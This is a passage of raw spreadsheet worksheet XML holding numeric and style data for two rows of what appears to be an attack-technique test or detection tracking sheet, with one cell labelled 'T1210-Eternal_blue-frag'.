      <c r="DC51" s="116">
        <v>33</v>
      </c>
      <c r="DD51" s="101">
        <v>0</v>
      </c>
      <c r="DE51" s="102">
        <v>0</v>
      </c>
      <c r="DF51" s="102">
        <v>0</v>
      </c>
      <c r="DG51" s="103">
        <v>0</v>
      </c>
      <c r="DH51" s="103">
        <v>0</v>
      </c>
      <c r="DI51" s="104">
        <v>0</v>
      </c>
      <c r="DJ51" s="105">
        <v>0</v>
      </c>
      <c r="DK51" s="106">
        <v>0</v>
      </c>
      <c r="DL51" s="497">
        <v>0</v>
      </c>
      <c r="DM51" s="107">
        <v>0</v>
      </c>
      <c r="DN51" s="107">
        <v>0</v>
      </c>
      <c r="DO51" s="108">
        <v>0</v>
      </c>
      <c r="DP51" s="109">
        <v>0</v>
      </c>
      <c r="DQ51" s="110">
        <v>0</v>
      </c>
      <c r="DR51" s="501">
        <v>0</v>
      </c>
      <c r="DS51" s="111">
        <v>0</v>
      </c>
      <c r="DT51" s="111">
        <v>0</v>
      </c>
      <c r="DU51" s="112">
        <v>0</v>
      </c>
      <c r="DV51" s="113">
        <v>32</v>
      </c>
      <c r="DW51" s="114" t="s">
        <v>3260</v>
      </c>
      <c r="DX51" s="503">
        <v>22</v>
      </c>
      <c r="DY51" s="115" t="s">
        <v>3261</v>
      </c>
      <c r="DZ51" s="115">
        <v>2</v>
      </c>
      <c r="EA51" s="116">
        <v>22</v>
      </c>
      <c r="EB51" s="250">
        <v>0</v>
      </c>
      <c r="EC51" s="251">
        <v>0</v>
      </c>
      <c r="ED51" s="505">
        <v>0</v>
      </c>
      <c r="EE51" s="252">
        <v>0</v>
      </c>
      <c r="EF51" s="252">
        <v>0</v>
      </c>
      <c r="EG51" s="253">
        <v>0</v>
      </c>
      <c r="EH51" s="101">
        <v>32</v>
      </c>
      <c r="EI51" s="102" t="s">
        <v>3260</v>
      </c>
      <c r="EJ51" s="102">
        <v>22</v>
      </c>
      <c r="EK51" s="103" t="s">
        <v>3261</v>
      </c>
      <c r="EL51" s="103">
        <v>2</v>
      </c>
      <c r="EM51" s="104">
        <v>22</v>
      </c>
      <c r="EN51" s="105">
        <v>0</v>
      </c>
      <c r="EO51" s="106">
        <v>0</v>
      </c>
      <c r="EP51" s="497">
        <v>0</v>
      </c>
      <c r="EQ51" s="107">
        <v>0</v>
      </c>
      <c r="ER51" s="107">
        <v>0</v>
      </c>
      <c r="ES51" s="108">
        <v>0</v>
      </c>
      <c r="ET51" s="109">
        <v>0</v>
      </c>
      <c r="EU51" s="110">
        <v>0</v>
      </c>
      <c r="EV51" s="501">
        <v>0</v>
      </c>
      <c r="EW51" s="111">
        <v>0</v>
      </c>
      <c r="EX51" s="111">
        <v>0</v>
      </c>
      <c r="EY51" s="112">
        <v>0</v>
      </c>
      <c r="EZ51" s="113">
        <v>0</v>
      </c>
      <c r="FA51" s="114">
        <v>0</v>
      </c>
      <c r="FB51" s="503">
        <v>0</v>
      </c>
      <c r="FC51" s="115">
        <v>0</v>
      </c>
      <c r="FD51" s="115">
        <v>0</v>
      </c>
      <c r="FE51" s="116">
        <v>0</v>
      </c>
      <c r="FF51" s="101">
        <v>14</v>
      </c>
      <c r="FG51" s="102" t="s">
        <v>1829</v>
      </c>
      <c r="FH51" s="102">
        <v>10</v>
      </c>
      <c r="FI51" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ51" s="103">
        <v>1</v>
      </c>
      <c r="FK51" s="104">
        <v>10</v>
      </c>
      <c r="FL51" s="105">
        <v>0</v>
      </c>
      <c r="FM51" s="106">
        <v>0</v>
      </c>
      <c r="FN51" s="497">
        <v>0</v>
      </c>
      <c r="FO51" s="107">
        <v>0</v>
      </c>
      <c r="FP51" s="107">
        <v>0</v>
      </c>
      <c r="FQ51" s="108">
        <v>0</v>
      </c>
      <c r="FR51" s="109">
        <v>14</v>
      </c>
      <c r="FS51" s="110" t="s">
        <v>1829</v>
      </c>
      <c r="FT51" s="501">
        <v>10</v>
      </c>
      <c r="FU51" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV51" s="111">
        <v>1</v>
      </c>
      <c r="FW51" s="112">
        <v>10</v>
      </c>
      <c r="FX51" s="113">
        <v>14</v>
      </c>
      <c r="FY51" s="114" t="s">
        <v>1829</v>
      </c>
      <c r="FZ51" s="503">
        <v>10</v>
      </c>
      <c r="GA51" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB51" s="115">
        <v>1</v>
      </c>
      <c r="GC51" s="116">
        <v>10</v>
      </c>
      <c r="GD51" s="250">
        <v>4</v>
      </c>
      <c r="GE51" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF51" s="505">
        <v>2</v>
      </c>
      <c r="GG51" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH51" s="252">
        <v>2</v>
      </c>
      <c r="GI51" s="253">
        <v>1</v>
      </c>
      <c r="GJ51" s="101">
        <v>18</v>
      </c>
      <c r="GK51" s="102" t="s">
        <v>3262</v>
      </c>
      <c r="GL51" s="102">
        <v>12</v>
      </c>
      <c r="GM51" s="103" t="s">
        <v>2565</v>
      </c>
      <c r="GN51" s="103">
        <v>3</v>
      </c>
      <c r="GO51" s="104">
        <v>11</v>
      </c>
      <c r="GP51" s="105">
        <v>0</v>
      </c>
      <c r="GQ51" s="106">
        <v>0</v>
      </c>
      <c r="GR51" s="497">
        <v>0</v>
      </c>
      <c r="GS51" s="107">
        <v>0</v>
      </c>
      <c r="GT51" s="107">
        <v>0</v>
      </c>
      <c r="GU51" s="108">
        <v>0</v>
      </c>
      <c r="GV51" s="109">
        <v>0</v>
      </c>
      <c r="GW51" s="110">
        <v>0</v>
      </c>
      <c r="GX51" s="501">
        <v>0</v>
      </c>
      <c r="GY51" s="111">
        <v>0</v>
      </c>
      <c r="GZ51" s="111">
        <v>0</v>
      </c>
      <c r="HA51" s="112">
        <v>0</v>
      </c>
      <c r="HB51" s="113">
        <v>14</v>
      </c>
      <c r="HC51" s="114" t="s">
        <v>1829</v>
      </c>
      <c r="HD51" s="503">
        <v>10</v>
      </c>
      <c r="HE51" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF51" s="115">
        <v>1</v>
      </c>
      <c r="HG51" s="116">
        <v>10</v>
      </c>
      <c r="HH51" s="101">
        <v>48</v>
      </c>
      <c r="HI51" s="102" t="s">
        <v>3263</v>
      </c>
      <c r="HJ51" s="102">
        <v>48</v>
      </c>
      <c r="HK51" s="103" t="s">
        <v>3264</v>
      </c>
      <c r="HL51" s="103">
        <v>3</v>
      </c>
      <c r="HM51" s="104">
        <v>23</v>
      </c>
      <c r="HN51" s="105">
        <v>0</v>
      </c>
      <c r="HO51" s="106">
        <v>0</v>
      </c>
      <c r="HP51" s="497">
        <v>0</v>
      </c>
      <c r="HQ51" s="107">
        <v>0</v>
      </c>
      <c r="HR51" s="107">
        <v>0</v>
      </c>
      <c r="HS51" s="108">
        <v>0</v>
      </c>
      <c r="HT51" s="109">
        <v>48</v>
      </c>
      <c r="HU51" s="110" t="s">
        <v>3263</v>
      </c>
      <c r="HV51" s="501">
        <v>48</v>
      </c>
      <c r="HW51" s="111" t="s">
        <v>3264</v>
      </c>
      <c r="HX51" s="111">
        <v>3</v>
      </c>
      <c r="HY51" s="112">
        <v>23</v>
      </c>
      <c r="HZ51" s="113">
        <v>48</v>
      </c>
      <c r="IA51" s="114" t="s">
        <v>3263</v>
      </c>
      <c r="IB51" s="503">
        <v>48</v>
      </c>
      <c r="IC51" s="115" t="s">
        <v>3264</v>
      </c>
      <c r="ID51" s="115">
        <v>3</v>
      </c>
      <c r="IE51" s="116">
        <v>23</v>
      </c>
      <c r="IF51" s="250">
        <v>8</v>
      </c>
      <c r="IG51" s="251" t="s">
        <v>3265</v>
      </c>
      <c r="IH51" s="505">
        <v>8</v>
      </c>
      <c r="II51" s="252" t="s">
        <v>3266</v>
      </c>
      <c r="IJ51" s="252">
        <v>8</v>
      </c>
      <c r="IK51" s="253">
        <v>2</v>
      </c>
      <c r="IL51" s="101">
        <v>56</v>
      </c>
      <c r="IM51" s="102" t="s">
        <v>3267</v>
      </c>
      <c r="IN51" s="102">
        <v>56</v>
      </c>
      <c r="IO51" s="103" t="s">
        <v>3268</v>
      </c>
      <c r="IP51" s="103">
        <v>11</v>
      </c>
      <c r="IQ51" s="104">
        <v>24</v>
      </c>
      <c r="IR51" s="105">
        <v>0</v>
      </c>
      <c r="IS51" s="106">
        <v>0</v>
      </c>
      <c r="IT51" s="497">
        <v>0</v>
      </c>
      <c r="IU51" s="107">
        <v>0</v>
      </c>
      <c r="IV51" s="107">
        <v>0</v>
      </c>
      <c r="IW51" s="108">
        <v>0</v>
      </c>
      <c r="IX51" s="109">
        <v>0</v>
      </c>
      <c r="IY51" s="110">
        <v>0</v>
      </c>
      <c r="IZ51" s="501">
        <v>0</v>
      </c>
      <c r="JA51" s="111">
        <v>0</v>
      </c>
      <c r="JB51" s="111">
        <v>0</v>
      </c>
      <c r="JC51" s="112">
        <v>0</v>
      </c>
      <c r="JD51" s="113">
        <v>48</v>
      </c>
      <c r="JE51" s="114" t="s">
        <v>3263</v>
      </c>
      <c r="JF51" s="503">
        <v>48</v>
      </c>
      <c r="JG51" s="115" t="s">
        <v>3264</v>
      </c>
      <c r="JH51" s="115">
        <v>3</v>
      </c>
      <c r="JI51" s="116">
        <v>23</v>
      </c>
      <c r="JJ51" s="101">
        <v>0</v>
      </c>
      <c r="JK51" s="102">
        <v>0</v>
      </c>
      <c r="JL51" s="102">
        <v>0</v>
      </c>
      <c r="JM51" s="103">
        <v>0</v>
      </c>
      <c r="JN51" s="103">
        <v>0</v>
      </c>
      <c r="JO51" s="104">
        <v>0</v>
      </c>
      <c r="JP51" s="105">
        <v>0</v>
      </c>
      <c r="JQ51" s="106">
        <v>0</v>
      </c>
      <c r="JR51" s="497">
        <v>0</v>
      </c>
      <c r="JS51" s="107">
        <v>0</v>
      </c>
      <c r="JT51" s="107">
        <v>0</v>
      </c>
      <c r="JU51" s="108">
        <v>0</v>
      </c>
      <c r="JV51" s="109">
        <v>0</v>
      </c>
      <c r="JW51" s="110">
        <v>0</v>
      </c>
      <c r="JX51" s="501">
        <v>0</v>
      </c>
      <c r="JY51" s="111">
        <v>0</v>
      </c>
      <c r="JZ51" s="111">
        <v>0</v>
      </c>
      <c r="KA51" s="112">
        <v>0</v>
      </c>
      <c r="KB51" s="113">
        <v>0</v>
      </c>
      <c r="KC51" s="114">
        <v>0</v>
      </c>
      <c r="KD51" s="503">
        <v>0</v>
      </c>
      <c r="KE51" s="115">
        <v>0</v>
      </c>
      <c r="KF51" s="115">
        <v>0</v>
      </c>
      <c r="KG51" s="116">
        <v>0</v>
      </c>
      <c r="KH51" s="250">
        <v>0</v>
      </c>
      <c r="KI51" s="251">
        <v>0</v>
      </c>
      <c r="KJ51" s="505">
        <v>0</v>
      </c>
      <c r="KK51" s="252">
        <v>0</v>
      </c>
      <c r="KL51" s="252">
        <v>0</v>
      </c>
      <c r="KM51" s="253">
        <v>0</v>
      </c>
      <c r="KN51" s="101">
        <v>0</v>
      </c>
      <c r="KO51" s="102">
        <v>0</v>
      </c>
      <c r="KP51" s="102">
        <v>0</v>
      </c>
      <c r="KQ51" s="103">
        <v>0</v>
      </c>
      <c r="KR51" s="103">
        <v>0</v>
      </c>
      <c r="KS51" s="104">
        <v>0</v>
      </c>
      <c r="KT51" s="105">
        <v>0</v>
      </c>
      <c r="KU51" s="106">
        <v>0</v>
      </c>
      <c r="KV51" s="497">
        <v>0</v>
      </c>
      <c r="KW51" s="107">
        <v>0</v>
      </c>
      <c r="KX51" s="107">
        <v>0</v>
      </c>
      <c r="KY51" s="108">
        <v>0</v>
      </c>
      <c r="KZ51" s="109">
        <v>0</v>
      </c>
      <c r="LA51" s="110">
        <v>0</v>
      </c>
      <c r="LB51" s="501">
        <v>0</v>
      </c>
      <c r="LC51" s="111">
        <v>0</v>
      </c>
      <c r="LD51" s="111">
        <v>0</v>
      </c>
      <c r="LE51" s="112">
        <v>0</v>
      </c>
      <c r="LF51" s="113">
        <v>0</v>
      </c>
      <c r="LG51" s="114">
        <v>0</v>
      </c>
      <c r="LH51" s="503">
        <v>0</v>
      </c>
      <c r="LI51" s="115">
        <v>0</v>
      </c>
      <c r="LJ51" s="115">
        <v>0</v>
      </c>
      <c r="LK51" s="116">
        <v>0</v>
      </c>
      <c r="LL51" s="117">
        <v>75</v>
      </c>
      <c r="LM51" s="507">
        <v>75</v>
      </c>
      <c r="LN51" s="119">
        <v>0</v>
      </c>
      <c r="LO51" s="119">
        <v>8</v>
      </c>
      <c r="LP51" s="119">
        <v>73</v>
      </c>
      <c r="LQ51" s="119">
        <v>0</v>
      </c>
      <c r="LR51" s="119">
        <v>73</v>
      </c>
      <c r="LS51" s="119">
        <v>73</v>
      </c>
      <c r="LT51" s="382"/>
      <c r="LU51" s="117">
        <v>0</v>
      </c>
      <c r="LV51" s="118">
        <v>0</v>
      </c>
      <c r="LW51" s="507">
        <v>0</v>
      </c>
      <c r="LX51" s="119">
        <v>0</v>
      </c>
      <c r="LY51" s="119">
        <v>0</v>
      </c>
      <c r="LZ51" s="119">
        <v>0</v>
      </c>
      <c r="MA51" s="117">
        <v>0</v>
      </c>
      <c r="MB51" s="118">
        <v>0</v>
      </c>
      <c r="MC51" s="507">
        <v>0</v>
      </c>
      <c r="MD51" s="119">
        <v>0</v>
      </c>
      <c r="ME51" s="119">
        <v>0</v>
      </c>
      <c r="MF51" s="119">
        <v>0</v>
      </c>
      <c r="MG51" s="117">
        <v>0</v>
      </c>
      <c r="MH51" s="118">
        <v>0</v>
      </c>
      <c r="MI51" s="507">
        <v>0</v>
      </c>
      <c r="MJ51" s="119">
        <v>0</v>
      </c>
      <c r="MK51" s="119">
        <v>0</v>
      </c>
      <c r="ML51" s="119">
        <v>0</v>
      </c>
      <c r="MM51" s="117">
        <v>0</v>
      </c>
      <c r="MN51" s="118">
        <v>0</v>
      </c>
      <c r="MO51" s="507">
        <v>0</v>
      </c>
      <c r="MP51" s="119">
        <v>0</v>
      </c>
      <c r="MQ51" s="119">
        <v>0</v>
      </c>
      <c r="MR51" s="119">
        <v>0</v>
      </c>
      <c r="MS51" s="117">
        <v>0</v>
      </c>
      <c r="MT51" s="118">
        <v>0</v>
      </c>
      <c r="MU51" s="507">
        <v>0</v>
      </c>
      <c r="MV51" s="119">
        <v>0</v>
      </c>
      <c r="MW51" s="119">
        <v>0</v>
      </c>
      <c r="MX51" s="119">
        <v>0</v>
      </c>
      <c r="MY51" s="117">
        <v>0</v>
      </c>
      <c r="MZ51" s="118">
        <v>0</v>
      </c>
      <c r="NA51" s="507">
        <v>0</v>
      </c>
      <c r="NB51" s="119">
        <v>0</v>
      </c>
      <c r="NC51" s="119">
        <v>0</v>
      </c>
      <c r="ND51" s="119">
        <v>0</v>
      </c>
      <c r="NE51" s="117">
        <v>0</v>
      </c>
      <c r="NF51" s="118">
        <v>0</v>
      </c>
      <c r="NG51" s="507">
        <v>0</v>
      </c>
      <c r="NH51" s="119">
        <v>0</v>
      </c>
      <c r="NI51" s="119">
        <v>0</v>
      </c>
      <c r="NJ51" s="119">
        <v>0</v>
      </c>
      <c r="NK51" s="117">
        <v>1</v>
      </c>
      <c r="NL51" s="118" t="s">
        <v>4316</v>
      </c>
      <c r="NM51" s="507">
        <v>1</v>
      </c>
      <c r="NN51" s="119" t="s">
        <v>2515</v>
      </c>
      <c r="NO51" s="119">
        <v>1</v>
      </c>
      <c r="NP51" s="119">
        <v>1</v>
      </c>
      <c r="NQ51" s="117">
        <v>0</v>
      </c>
      <c r="NR51" s="118">
        <v>0</v>
      </c>
      <c r="NS51" s="507">
        <v>0</v>
      </c>
      <c r="NT51" s="119">
        <v>0</v>
      </c>
      <c r="NU51" s="119">
        <v>0</v>
      </c>
      <c r="NV51" s="119">
        <v>0</v>
      </c>
      <c r="NW51" s="117">
        <v>74</v>
      </c>
      <c r="NX51" s="118" t="s">
        <v>4367</v>
      </c>
      <c r="NY51" s="507">
        <v>74</v>
      </c>
      <c r="NZ51" s="119" t="s">
        <v>4368</v>
      </c>
      <c r="OA51" s="119">
        <v>7</v>
      </c>
      <c r="OB51" s="119">
        <v>73</v>
      </c>
      <c r="OC51" s="120">
        <v>8</v>
      </c>
      <c r="OD51" s="120">
        <v>8</v>
      </c>
      <c r="OE51" s="120">
        <v>2</v>
      </c>
      <c r="OF51" s="121">
        <v>2</v>
      </c>
      <c r="OG51" s="120">
        <v>7</v>
      </c>
      <c r="OH51" s="120">
        <v>7</v>
      </c>
      <c r="OI51" s="120">
        <v>7</v>
      </c>
      <c r="OJ51" s="120">
        <v>7</v>
      </c>
      <c r="OK51" s="383"/>
      <c r="OL51" s="120">
        <v>8</v>
      </c>
      <c r="OM51" s="120">
        <v>8</v>
      </c>
      <c r="ON51" s="120">
        <v>8</v>
      </c>
      <c r="OO51" s="120" t="s">
        <v>3269</v>
      </c>
      <c r="OP51" s="120">
        <v>2</v>
      </c>
      <c r="OQ51" s="464">
        <v>7</v>
      </c>
      <c r="OR51" s="120">
        <v>0</v>
      </c>
      <c r="OS51" s="120">
        <v>0</v>
      </c>
      <c r="OT51" s="120">
        <v>0</v>
      </c>
      <c r="OU51" s="120"/>
      <c r="OV51" s="120">
        <v>0</v>
      </c>
      <c r="OW51" s="464">
        <v>0</v>
      </c>
      <c r="OX51" s="120">
        <v>0</v>
      </c>
      <c r="OY51" s="120">
        <v>0</v>
      </c>
      <c r="OZ51" s="120">
        <v>0</v>
      </c>
      <c r="PA51" s="120"/>
      <c r="PB51" s="120">
        <v>0</v>
      </c>
      <c r="PC51" s="464">
        <v>0</v>
      </c>
      <c r="PD51" s="120">
        <v>0</v>
      </c>
      <c r="PE51" s="120">
        <v>0</v>
      </c>
      <c r="PF51" s="120">
        <v>0</v>
      </c>
      <c r="PG51" s="120"/>
      <c r="PH51" s="120">
        <v>0</v>
      </c>
      <c r="PI51" s="464">
        <v>0</v>
      </c>
      <c r="PJ51" s="120">
        <v>0</v>
      </c>
      <c r="PK51" s="120">
        <v>0</v>
      </c>
      <c r="PL51" s="120">
        <v>0</v>
      </c>
      <c r="PM51" s="120"/>
      <c r="PN51" s="120">
        <v>0</v>
      </c>
      <c r="PO51" s="464">
        <v>0</v>
      </c>
      <c r="PP51" s="120">
        <v>0</v>
      </c>
      <c r="PQ51" s="120">
        <v>0</v>
      </c>
      <c r="PR51" s="120">
        <v>0</v>
      </c>
      <c r="PS51" s="120"/>
      <c r="PT51" s="120">
        <v>0</v>
      </c>
      <c r="PU51" s="464">
        <v>0</v>
      </c>
      <c r="PV51" s="120">
        <v>8</v>
      </c>
      <c r="PW51" s="120">
        <v>8</v>
      </c>
      <c r="PX51" s="120">
        <v>7</v>
      </c>
      <c r="PY51" s="120" t="s">
        <v>4441</v>
      </c>
      <c r="PZ51" s="120">
        <v>2</v>
      </c>
      <c r="QA51" s="464">
        <v>7</v>
      </c>
      <c r="QB51" s="120">
        <v>0</v>
      </c>
      <c r="QC51" s="120">
        <v>0</v>
      </c>
      <c r="QD51" s="120">
        <v>0</v>
      </c>
      <c r="QE51" s="120"/>
      <c r="QF51" s="120">
        <v>0</v>
      </c>
      <c r="QG51" s="464">
        <v>0</v>
      </c>
      <c r="QH51" s="120">
        <v>0</v>
      </c>
      <c r="QI51" s="120">
        <v>0</v>
      </c>
      <c r="QJ51" s="120">
        <v>0</v>
      </c>
      <c r="QK51" s="120"/>
      <c r="QL51" s="120">
        <v>0</v>
      </c>
      <c r="QM51" s="464">
        <v>0</v>
      </c>
      <c r="QN51" s="120">
        <v>0</v>
      </c>
      <c r="QO51" s="120">
        <v>0</v>
      </c>
      <c r="QP51" s="120">
        <v>0</v>
      </c>
      <c r="QQ51" s="120"/>
      <c r="QR51" s="120">
        <v>0</v>
      </c>
      <c r="QS51" s="464">
        <v>0</v>
      </c>
      <c r="QT51" s="184"/>
      <c r="QU51" s="184"/>
      <c r="QV51" s="184"/>
      <c r="QW51" s="184"/>
      <c r="QX51" s="184"/>
      <c r="QY51" s="184"/>
      <c r="QZ51" s="184"/>
      <c r="RA51" s="184"/>
      <c r="RB51" s="184"/>
      <c r="RC51" s="184"/>
      <c r="RD51" s="184"/>
      <c r="RE51" s="184"/>
      <c r="RF51" s="184"/>
      <c r="RG51" s="184"/>
      <c r="RH51" s="184"/>
      <c r="RI51" s="184"/>
      <c r="RJ51" s="184"/>
      <c r="RK51" s="184"/>
      <c r="RL51" s="184"/>
      <c r="RM51" s="184"/>
      <c r="RN51" s="184"/>
      <c r="RO51" s="184"/>
      <c r="RP51" s="184"/>
      <c r="RQ51" s="184"/>
      <c r="RR51" s="184"/>
      <c r="RS51" s="184"/>
      <c r="RT51" s="184"/>
      <c r="RU51" s="184"/>
      <c r="RV51" s="184"/>
      <c r="RW51" s="184"/>
      <c r="RX51" s="184"/>
      <c r="RY51" s="184"/>
      <c r="RZ51" s="184"/>
      <c r="SA51" s="184"/>
      <c r="SB51" s="184"/>
      <c r="SC51" s="184"/>
      <c r="SD51" s="184"/>
      <c r="SE51" s="184"/>
      <c r="SF51" s="184"/>
      <c r="SG51" s="184"/>
      <c r="SH51" s="184"/>
      <c r="SI51" s="184"/>
      <c r="SJ51" s="184"/>
      <c r="SK51" s="184"/>
      <c r="SL51" s="184"/>
      <c r="SM51" s="184"/>
      <c r="SN51" s="184"/>
      <c r="SO51" s="184"/>
      <c r="SP51" s="184"/>
      <c r="SQ51" s="184"/>
      <c r="SR51" s="184"/>
      <c r="SS51" s="184"/>
      <c r="ST51" s="184"/>
      <c r="SU51" s="184"/>
      <c r="SV51" s="184"/>
      <c r="SW51" s="184"/>
      <c r="SX51" s="184"/>
      <c r="SY51" s="184"/>
      <c r="SZ51" s="184"/>
      <c r="TA51" s="184"/>
      <c r="TB51" s="184"/>
      <c r="TC51" s="184"/>
      <c r="TD51" s="184"/>
      <c r="TE51" s="184"/>
      <c r="TF51" s="184"/>
      <c r="TG51" s="184"/>
      <c r="TH51" s="184"/>
      <c r="TI51" s="184"/>
      <c r="TJ51" s="184"/>
      <c r="TK51" s="184"/>
      <c r="TL51" s="184"/>
      <c r="TM51" s="184"/>
      <c r="TN51" s="184"/>
      <c r="TO51" s="184"/>
      <c r="TP51" s="184"/>
      <c r="TQ51" s="184"/>
      <c r="TR51" s="184"/>
      <c r="TS51" s="184"/>
      <c r="TT51" s="184"/>
      <c r="TU51" s="184"/>
      <c r="TV51" s="184"/>
      <c r="TW51" s="184"/>
      <c r="TX51" s="184"/>
      <c r="TY51" s="184"/>
      <c r="TZ51" s="184"/>
      <c r="UA51" s="184"/>
      <c r="UB51" s="184"/>
      <c r="UC51" s="184"/>
      <c r="UD51" s="184"/>
      <c r="UE51" s="184"/>
      <c r="UF51" s="184"/>
      <c r="UG51" s="184"/>
      <c r="UH51" s="184"/>
      <c r="UI51" s="184"/>
      <c r="UJ51" s="184"/>
      <c r="UK51" s="184"/>
      <c r="UL51" s="184"/>
      <c r="UM51" s="184"/>
      <c r="UN51" s="184"/>
      <c r="UO51" s="184"/>
      <c r="UP51" s="184"/>
      <c r="UQ51" s="184"/>
      <c r="UR51" s="184"/>
      <c r="US51" s="184"/>
      <c r="UT51" s="184"/>
      <c r="UU51" s="184"/>
      <c r="UV51" s="184"/>
      <c r="UW51" s="184"/>
      <c r="UX51" s="184"/>
      <c r="UY51" s="184"/>
      <c r="UZ51" s="184"/>
      <c r="VA51" s="184"/>
      <c r="VB51" s="184"/>
      <c r="VC51" s="184"/>
      <c r="VD51" s="184"/>
      <c r="VE51" s="184"/>
      <c r="VF51" s="184"/>
      <c r="VG51" s="184"/>
      <c r="VH51" s="184"/>
      <c r="VI51" s="184"/>
      <c r="VJ51" s="184"/>
      <c r="VK51" s="184"/>
      <c r="VL51" s="184"/>
      <c r="VM51" s="184"/>
      <c r="VN51" s="184"/>
      <c r="VO51" s="184"/>
      <c r="VP51" s="184"/>
      <c r="VQ51" s="184"/>
      <c r="VR51" s="184"/>
      <c r="VS51" s="184"/>
      <c r="VT51" s="184"/>
      <c r="VU51" s="184"/>
      <c r="VV51" s="184"/>
      <c r="VW51" s="184"/>
      <c r="VX51" s="184"/>
      <c r="VY51" s="184"/>
    </row>
    <row r="52" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A52" s="82" t="s">
        <v>22</v>
      </c>
      <c r="B52" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C52" s="83" t="s">
        <v>327</v>
      </c>
      <c r="D52" s="83" t="s">
        <v>96</v>
      </c>
      <c r="E52" s="83">
        <f t="shared" si="2"/>
        <v>40</v>
      </c>
      <c r="F52" s="83" t="s">
        <v>97</v>
      </c>
      <c r="G52" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H52" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I52" s="81" t="s">
        <v>1214</v>
      </c>
      <c r="J52" s="85" t="s">
        <v>1215</v>
      </c>
      <c r="K52" s="81" t="s">
        <v>901</v>
      </c>
      <c r="L52" s="81" t="s">
        <v>1216</v>
      </c>
      <c r="M52" s="378" t="s">
        <v>223</v>
      </c>
      <c r="N52" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O52" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P52" s="91"/>
      <c r="Q52" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R52" s="92" t="s">
        <v>1217</v>
      </c>
      <c r="S52" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T52" s="92" t="s">
        <v>1218</v>
      </c>
      <c r="U52" s="94" t="s">
        <v>1219</v>
      </c>
      <c r="V52" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W52" s="96" t="s">
        <v>1220</v>
      </c>
      <c r="X52" s="97" t="s">
        <v>1221</v>
      </c>
      <c r="Y52" s="83" t="s">
        <v>1222</v>
      </c>
      <c r="Z52" s="98" t="s">
        <v>1223</v>
      </c>
      <c r="AA52" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB52" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC52" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD52" s="83"/>
      <c r="AE52" s="83"/>
      <c r="AF52" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG52" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH52" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI52" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ52" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK52" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL52" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM52" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN52" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO52" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP52" s="385" t="str">
        <f>M52&amp;"-frag"</f>
        <v>T1210-Eternal_blue-frag</v>
      </c>
      <c r="AQ52" s="358">
        <v>24</v>
      </c>
      <c r="AR52" s="100"/>
      <c r="AS52" s="100">
        <v>2</v>
      </c>
      <c r="AT52" s="100">
        <v>0</v>
      </c>
      <c r="AU52" s="100">
        <v>2</v>
      </c>
      <c r="AV52" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW52" s="100">
        <v>2</v>
      </c>
      <c r="AX52" s="100">
        <v>2</v>
      </c>
      <c r="AY52" s="100">
        <v>0</v>
      </c>
      <c r="AZ52" s="100">
        <v>2</v>
      </c>
      <c r="BA52" s="381"/>
      <c r="BB52" s="101">
        <v>28</v>
      </c>
      <c r="BC52" s="102" t="s">
        <v>3270</v>
      </c>
      <c r="BD52" s="102">
        <v>7</v>
      </c>
      <c r="BE52" s="103" t="s">
        <v>3271</v>
      </c>
      <c r="BF52" s="103">
        <v>5</v>
      </c>
      <c r="BG52" s="104">
        <v>3</v>
      </c>
      <c r="BH52" s="105">
        <v>10</v>
      </c>
      <c r="BI52" s="106" t="s">
        <v>3272</v>
      </c>
      <c r="BJ52" s="497">
        <v>9</v>
      </c>
      <c r="BK52" s="107" t="s">
        <v>3273</v>
      </c>
      <c r="BL52" s="107">
        <v>8</v>
      </c>
      <c r="BM52" s="108">
        <v>3</v>
      </c>
      <c r="BN52" s="109">
        <v>38</v>
      </c>
      <c r="BO52" s="110" t="s">
        <v>2020</v>
      </c>
      <c r="BP52" s="501">
        <v>16</v>
      </c>
      <c r="BQ52" s="111" t="s">
        <v>2021</v>
      </c>
      <c r="BR52" s="111">
        <v>13</v>
      </c>
      <c r="BS52" s="112">
        <v>3</v>
      </c>
      <c r="BT52" s="113">
        <v>52</v>
      </c>
      <c r="BU52" s="114" t="s">
        <v>3274</v>
      </c>
      <c r="BV52" s="503">
        <v>17</v>
      </c>
      <c r="BW52" s="115" t="s">
        <v>3275</v>
      </c>
      <c r="BX52" s="115">
        <v>12</v>
      </c>
      <c r="BY52" s="116">
        <v>5</v>
      </c>
      <c r="BZ52" s="250">
        <v>25</v>
      </c>
      <c r="CA52" s="251" t="s">
        <v>3276</v>
      </c>
      <c r="CB52" s="505">
        <v>22</v>
      </c>
      <c r="CC52" s="252" t="s">
        <v>3277</v>
      </c>
      <c r="CD52" s="252">
        <v>18</v>
      </c>
      <c r="CE52" s="253">
        <v>6</v>
      </c>
      <c r="CF52" s="101">
        <v>77</v>
      </c>
      <c r="CG52" s="102" t="s">
        <v>3278</v>
      </c>
      <c r="CH52" s="102">
        <v>39</v>
      </c>
      <c r="CI52" s="103" t="s">
        <v>3279</v>
      </c>
      <c r="CJ52" s="103">
        <v>30</v>
      </c>
      <c r="CK52" s="104">
        <v>6</v>
      </c>
      <c r="CL52" s="105">
        <v>16</v>
